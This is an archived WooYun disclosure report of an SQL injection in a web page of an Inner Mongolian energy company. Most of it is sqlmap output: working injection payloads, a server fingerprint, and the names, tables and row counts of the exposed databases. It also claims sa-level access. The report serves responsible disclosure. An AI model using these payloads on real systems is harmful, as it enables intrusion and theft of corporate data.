乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-11: 细节已通知厂商并且等待厂商处理中 2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
内蒙古伊泰集团有限公司是以煤炭生产、经营为主业,以铁路运输、煤制油为产业延伸,以房地产开发等非煤产业为互补的大型现代化能源企业。公司连续十年跻身中国企业500强,2014年位列第317位,同时,位列中国煤炭企业百强第21位、内蒙古煤炭企业50强之首。 目前,公司总资产超过千亿元,职工7600余人,下属内蒙古伊泰煤炭股份有限公司、内蒙古伊泰准东铁路有限责任公司、内蒙古伊泰呼准铁路有限公司、内蒙古伊泰煤制油有限责任公司、中科合成油技术有限公司、内蒙古伊泰置业有限责任公司等50家直接和间接控股公司,其中内蒙古伊泰煤炭股份有限公司为煤炭行业首家B+H股上市公司。
注入点:http://**.**.**.**/notesReport/ViewInformation.aspx?key=865内网 站库分离
sqlmap identified the following injection points with a total of 39 HTTP(s) requests:---Place: GETParameter: key Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: key=865 AND 1437=1437 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: key=865 AND 5939=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5939=5939) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: key=865 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(110)+CHAR(84)+CHAR(89)+CHAR(69)+CHAR(80)+CHAR(82)+CHAR(70)+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: key=865; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: key=865 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: key=(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008available databases [16]:[*] DynamicsAx[*] ECDev[*] ECPecupm[*] ECSupplierDataBase[*] master[*] model[*] msdb[*] ReportServer$SRM[*] ReportServer$SRMTempDB[*] SqlPersistenceService[*] tempdb[*] Tracking[*] uupm[*] wf[*] Workflow[*] YTDBsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: key=865 AND 1437=1437 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: key=865 AND 5939=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5939=5939) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: key=865 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(110)+CHAR(84)+CHAR(89)+CHAR(69)+CHAR(80)+CHAR(82)+CHAR(70)+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: key=865; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: key=865 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: key=(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008current database: 'ECDev'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: key Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: key=865 AND 1437=1437 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: key=865 AND 5939=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5939=5939) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: key=865 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(107)+CHAR(110)+CHAR(84)+CHAR(89)+CHAR(69)+CHAR(80)+CHAR(82)+CHAR(70)+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: key=865; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: key=865 WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: key=(SELECT CHAR(113)+CHAR(103)+CHAR(109)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4223=4223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(119)+CHAR(115)+CHAR(113))---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008Database: ECDev[148 tables]+-------------------------------------------------+| BaseScoreWeight || CompetitionScoreTable_M3 || CompetitionScoreTable_M3 || CompetitionScoreTable_M4 || CompetitionScoreTable_P1P3 || D99_CMD || D99_REG || D99_Tmp || DTMP || EC_InformationTitel || EC_NotesReport || EC_TAuditAtta || EC_TBusinessLog || EC_TContractTableExtend || EC_TContractUploadFile || EC_TEvaluationReportExtend || EC_TInquiryBookExtend || EC_TOrderLetterUploadFile || EC_TPicketageAtta || EC_TPurchPlanTableExtend || EC_TPurchReqIniTableExtend || EC_TSuppInfoToProdClassChangeOrderAudit1 || EC_TTEMP_TEST1 || EC_TTenderLockLog || EC_TTenderQuestionDetailAttachment || EC_TTenderQuestionDetailAttachment || EC_TTenderQuestionTitle || EC_TTenderSuppApply || EC_tMail || EC_tMailType || EC_tParameters____delete || EC_tPriceMarket_20130426 || EC_tPriceMarket_20130426 || EC_tPricePurchase || EC_tPriceRegion || EC_tPriceSource || EC_tSuppProdCatalog || Ec_NoteAttach || Ec_SuppInfo_View || Ec_SuppProdCatalog_View || Ec_TTenderDepute || Ec_rDegree || Ec_tBusinessContactAttachment || Ec_tBusinessTypeForSuppSorce || Ec_tBusinessTypeForSuppSorce || Ec_tCompanyFinancerInfo || Ec_tExpertProfession || Ec_tExpertProfession || Ec_tFactoryBusinessType || Ec_tFrameworkAgreement || Ec_tFrameworkAgreementUploadFile || Ec_tLog || Ec_tPortalUserInfo_Bak || Ec_tPortalUserInfo_Bak || Ec_tProfession || Ec_tToDoList || FactoryInventory || ImgUpload || Interface_Log || JudgeWeightTable_M3 || JudgeWeightTable_M3 || JudgeWeightTable_M4 || JudgeWeightTable_P1P3 || Pcitc_UserInfo_View || PurchReqApproveOfLIYUEFENG_view || SendMsgLog || Sheet1$ || Sheet2$ || TPC_TABLE || Table_1 || TempInventoryForBalance || View_BiddingPrice || View_ContractAndOrderLetterBusinessIDPurchMajor || View_ContractAndOrderLetterDetailNew || View_ContractAndOrderLetterDetailNew || View_ContractAndOrderLetterDetailOldApply || View_ContractAndOrderLetterListNew || View_ContractAndOrderLetterListNew || View_Ec_tProdPurType || View_SupplyForBidding || YT_tCheckSeq || Yt_ReportAttachment || Yt_tPayType || Yt_tPurchaseAddress || Yt_tSeqConsignmentClosingApplyMain || Yt_tSeqForCheckApply || Yt_tSeqForCheckApply || Yt_tSeqForCheckAssign || Yt_tSeqForCheckNotice || Yt_tSeqForCheckProcess || Yt_tSeqForCheckReport || Yt_tSeqForCheckSpotCheck || Yt_tSeqForDeliveryCheckApply || Yt_tSeqForExchangeGoods || Yt_tSeqForFundPlan || Yt_tSeqForOverDueProcessM || Yt_tSeqForReceiveGoods || Yt_tSeqForReducePrice || Yt_tSeqForRejectGoods || Yt_tSeqForRepeatCheck || Yt_tSeqForSupplyApplyMain || Yt_tSeqForTransCheckApply || Yt_tSeqForTransCheckReport || Yt_tSeqForTrialInfo || Yt_tSeqPayOrder || 不含6$ || 伊泰准东铁路员工竞聘统计报表$ || 办公用品年计划$ || 工单描述$ || 总表$ || 成本中心$ || 承包商$ || 数据更改$ || 物料价格$ || 物料分类$ || 物料类别$ || 申请延期协议$ || 设备中心用途表$ || 设备号描述$ || 设备用途$ || 车辆年计划$ || 银行old$ || 银行信息$ || 销售价$ || abc || comd_list || contracttest || ec_tinquirybook_2012_8_2 || evaluationreport_2012_8_8_back || jiaozhu || pangolin_test_table || pbcatcol || pbcatedt || pbcatfmt || pbcattbl || pbcatvld || profiler_out_table || sqlmapoutput || sysdiagrams || tBulletin || tBulletinType || t_jiaozhu || tempevaluationreport || tempprod || tempusertable || user_temp_backup || view_CheckSginInfo || 税率替换 |+-------------------------------------------------+Database: ECDev+-----------------------------------------------------+---------+| Table | Entries |+-----------------------------------------------------+---------+| dbo.Ec_tLog | 813803 || dbo.EC_tSuppProdCatalog | 796897 || dbo.SendMsgLog | 395460 || dbo.TempInventoryForBalance | 332729 || dbo.Ec_SuppProdCatalog_View | 231560 || dbo.View_ContractAndOrderLetterDetailNew | 158158 || dbo.View_ContractAndOrderLetterDetailNew | 158158 || dbo.[银行old$] | 129495 || dbo.[银行信息$] | 129493 || dbo.view_CheckSginInfo | 116966 || dbo.View_ContractAndOrderLetterDetailOldApply | 111184 || dbo.[不含6$] | 88221 || dbo.View_Ec_tProdPurType | 75898 || dbo.EC_tPricePurchase | 57893 || dbo.tempprod | 52850 || dbo.View_ContractAndOrderLetterBusinessIDPurchMajor | 51250 || dbo.View_ContractAndOrderLetterListNew | 37513 || dbo.View_ContractAndOrderLetterListNew | 37513 || dbo.CompetitionScoreTable_P1P3 | 35499 || dbo.Ec_tPortalUserInfo_Bak | 34141 || dbo.Ec_tPortalUserInfo_Bak | 34141 || dbo.[设备号描述$] | 32726 || dbo.[物料价格$] | 25008 || dbo.[销售价$] | 24537 || dbo.Pcitc_UserInfo_View | 23960 || dbo.EC_TContractTableExtend | 17108 || dbo.[申请延期协议$] | 17040 || dbo.profiler_out_table | 10744 || dbo.[物料类别$] | 4573 || dbo.[物料分类$] | 4173 || dbo.DTMP | 3523 || dbo.EC_TInquiryBookExtend | 3493 || dbo.TPC_TABLE | 3323 || dbo.Ec_SuppInfo_View | 3206 || dbo.contracttest | 3096 || dbo.CompetitionScoreTable_M3 | 2626 || dbo.CompetitionScoreTable_M3 | 2626 || dbo.Ec_tExpertProfession | 2226 || dbo.Ec_tExpertProfession | 2226 || dbo.[设备用途$] | 1757 || dbo.EC_TTenderQuestionTitle | 1698 || dbo.[设备中心用途表$] | 1693 || dbo.EC_TSuppInfoToProdClassChangeOrderAudit1 | 1680 || dbo.EC_TContractUploadFile | 1614 || dbo.Ec_tFrameworkAgreement | 1409 || dbo.[伊泰准东铁路员工竞聘统计报表$] | 1236 || dbo.EC_TTenderQuestionDetailAttachment | 1026 || dbo.EC_TTenderQuestionDetailAttachment | 1026 || dbo.EC_tPriceMarket_20130426 | 1021 || dbo.EC_tPriceMarket_20130426 | 1021 || dbo.abc | 818 || dbo.EC_NotesReport | 731 || dbo.user_temp_backup | 584 || dbo.CompetitionScoreTable_M4 | 559 || dbo.tempusertable | 504 || dbo.[成本中心$] | 496 || dbo.tempevaluationreport | 489 || dbo.ec_tinquirybook_2012_8_2 | 368 || dbo.[办公用品年计划$] | 361 || dbo.View_BiddingPrice | 349 || dbo.evaluationreport_2012_8_8_back | 347 || dbo.Ec_TTenderDepute | 274 || dbo.Ec_tFactoryBusinessType | 270 || dbo.EC_TEvaluationReportExtend | 267 || dbo.EC_TTenderLockLog | 245 || dbo.EC_TPurchPlanTableExtend | 227 || dbo.Sheet2$ | 175 || dbo.Ec_NoteAttach | 160 || dbo.[承包商$] | 147 || dbo.EC_TPurchReqIniTableExtend | 144 || dbo.View_SupplyForBidding | 126 || dbo.EC_TAuditAtta | 118 || dbo.Ec_tBusinessContactAttachment | 87 || dbo.Ec_tToDoList | 75 || dbo.PurchReqApproveOfLIYUEFENG_view | 68 || dbo.JudgeWeightTable_M3 | 59 || dbo.JudgeWeightTable_M3 | 59 || dbo.Sheet1$ | 50 || dbo.[工单描述$] | 45 || dbo.FactoryInventory | 42 || dbo.EC_TOrderLetterUploadFile | 41 || dbo.JudgeWeightTable_P1P3 | 40 || dbo.Ec_tCompanyFinancerInfo | 32 || dbo.EC_tMail | 26 || dbo.Yt_tSeqPayOrder | 24 || dbo.pangolin_test_table | 23 || dbo.Yt_tPayType | 23 || dbo.[数据更改$] | 21 || dbo.pbcatedt | 21 || dbo.pbcatfmt | 20 || dbo.[车辆年计划$] | 18 || dbo.Yt_tSeqForFundPlan | 15 || dbo.JudgeWeightTable_M4 | 13 || dbo.Yt_tSeqForCheckReport | 13 || dbo.BaseScoreWeight | 11 || dbo.D99_Tmp | 10 || dbo.Ec_rDegree | 10 || dbo.Ec_tBusinessTypeForSuppSorce | 10 || dbo.Ec_tBusinessTypeForSuppSorce | 10 || dbo.YT_tCheckSeq | 8 || dbo.D99_CMD | 7 || dbo.jiaozhu | 7 || dbo.Yt_tPurchaseAddress | 6 || dbo.Yt_tSeqForSupplyApplyMain | 6 || dbo.ImgUpload | 5 || dbo.Yt_tSeqForOverDueProcessM | 5 || dbo.Ec_tProfession | 4 || dbo.Yt_tSeqForCheckProcess | 4 || dbo.EC_InformationTitel | 3 || dbo.Ec_tFrameworkAgreementUploadFile | 3 || dbo.EC_tMailType | 3 || dbo.tBulletin | 3 || dbo.tBulletinType | 3 || dbo.Yt_tSeqForCheckAssign | 3 || dbo.EC_TBusinessLog | 2 || dbo.EC_tPriceRegion | 2 || dbo.EC_tPriceSource | 2 || dbo.Yt_tSeqForCheckApply | 2 || dbo.Yt_tSeqForCheckApply | 2 || dbo.Yt_tSeqForCheckSpotCheck | 2 || dbo.Yt_tSeqForReceiveGoods | 2 || dbo.Yt_tSeqForReducePrice | 2 || dbo.税率替换 | 2 || dbo.[总表$] | 1 || dbo.D99_REG | 1 || dbo.EC_tParameters____delete | 1 || dbo.Yt_tSeqConsignmentClosingApplyMain | 1 || dbo.Yt_tSeqForDeliveryCheckApply | 1 || dbo.Yt_tSeqForExchangeGoods | 1 || dbo.Yt_tSeqForRejectGoods | 1 || dbo.Yt_tSeqForRepeatCheck | 1 || dbo.Yt_tSeqForTransCheckApply | 1 || dbo.Yt_tSeqForTransCheckReport | 1 |+-----------------------------------------------------+---------+
到了这里 sa权限 各种能执行 数据库是 50的ip 但是网站是51的ip
由于站库分离 不知道路径啥的 写不了shell 也直接提权不了 所以就结束吧 但是数据库还是能全部脱的
已证明
过滤好参数
危害等级:高
漏洞Rank:12
确认时间:2015-09-11 16:15
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发内蒙古分中心,由其后续协调网站管理单位处置。
暂无